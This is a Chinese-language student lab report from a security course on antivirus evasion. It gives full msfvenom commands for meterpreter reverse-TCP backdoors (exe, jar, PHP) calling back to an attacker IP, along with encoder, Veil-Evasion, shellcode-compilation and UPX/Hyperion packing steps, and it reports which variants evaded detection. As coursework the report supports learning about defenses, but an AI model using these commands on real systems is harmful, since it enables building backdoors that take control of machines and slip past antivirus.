20165120 Exp3 免殺原理與實踐 =v=
Exp3 免殺原理與實踐:
1. 實踐內容(4分)
1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellcode編程(1分)
- 正確使用msf編碼器,生成exe文件
我們在實驗二中使用msf生成過一次後門程序,我們可以使用Virscan這個網站對生成的後門程序進行掃描。用virscan掃描後結果如下:
2. 嘗試用msf編碼器對後門程序進行一次到多次的編碼
十次編碼:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.144 LPORT=5120 -f exe > mpy20165120.exe
其中-i為指定編碼個數
將編碼十次後的可執行文件上傳到Virscan掃描後結果如下:
編碼效果總得來說並沒有啥用=。=
3.msfvenom生成jar文件
生成Java後門程序使用命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=5120 x> mpy.jar
msfvenom生成php文件
生成PHP後門程序使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=5120 x> mpy2.php
然後使用veil-evasion生成後門程序及檢測
4.Veil-Evasion安裝:
利用命令sudo apt-get install veil-evasion
進行安裝,之後用veil
打開veil,輸入y
繼續安裝直至完成
(ps:我不知道為什麽這個軟件可以安裝這麽久,運行邏輯簡直奇葩)
安裝成功後輸入veil
對此進行使用,啟動後就是這樣:
接著輸入use evasion
進入veil-evasion:
用C語言重寫meterperter,use c/meterpreter/rev_tcp.py
設置反彈連接IP及端口,註意此處IP是攻擊機IP
輸入generate
生成文件
輸入playload文件名字
到/var/lib/veil/output/compiled/mpytest.exe
這個路徑下找我們生成的exe文件:
繼續放到網站上面檢測一下:
好像厲害了一點哈?
5、半手工註入Shellcode並執行
首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=5120 -f c
用c語言生成一段shellcode;
創建一個文件mpy5.c
,然後將unsigned char buf[]
賦值到其中
使用命令i686-w64-mingw32-g++ mpy5.c -o mpy5.exe
編譯.c文件為可執行文件,然後放到網站上面檢測:
將之前的半手工打造的shellcode進行加殼:upx mpy5.exe -o mpy6.exe
再掃一下:(加了殼之後反而還更容易別檢測出來了=。=)
加密殼Hyperion
將上一個生成的文件拷貝到/usr/share/windows-binaries/hyperion/
目錄中
進入目錄/usr/share/windows-binaries/hyperion/
中
輸入wine hyperion.exe -v mpy6.exe mpy6_Hyperion.exe
然後再去網站上面掃一下:
然後更容易被檢測出來了!(wtf???)
1.2 通過組合應用各種技術實現惡意代碼免殺(0.5分)
(如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)
先放我們之前的文件查殺一下(能過最好。。。)
淦!被掃出來了,仔細想想有什麽辦法
我想起以前出逆向題的時候用過的一個加殼軟件,加個殼試試
然後生成的文件在丟出來查殺一下:
nice!成功了!
2 報告內容:
2.1.基礎問題回答
(1)殺軟是如何檢測出惡意代碼的?
根據本次實驗的經驗來看是通過特征碼來檢測的,因為原本的惡意軟件檢測出來的軟件比較少,加了殼之後的惡意軟件反而更能被識別出來了,說明這些殼都被加入了特征碼庫裏面。
(2)免殺是做什麽?
免殺是惡意軟件通過一些操作防止被殺毒軟件識別出來,以達到在用戶中留存的目的。
(3)免殺的基本方法有哪些?
修改惡意軟件的內容改變特征碼,或者加殼(比較復雜比較新的)之後就可以達到免殺的目的
2.2.實踐總結與體會
本次實驗最想讓我吐槽的一點就是veil這個軟件的安裝過程!!!真的是奇慢無比,後來查看了該軟件的運行邏輯,說真的很奇葩啊!我從別人那裏直接考了軟件本體跳了安裝部分終於成功了!
(ps:裝了一上午最後給我彈出來個這個真的有想把電腦砸掉的沖動)
2.3.開啟殺軟能絕對防止電腦中惡意代碼嗎?
不能,本次實驗的內容也說明了這一點,沒有百分百安全的系統,我們能做的就只有提高平時的安全意識,做到不亂下軟件,不瀏覽惡意網站,才能防止電腦中惡意代碼。
20165120 Exp3 免殺原理與實踐 =v=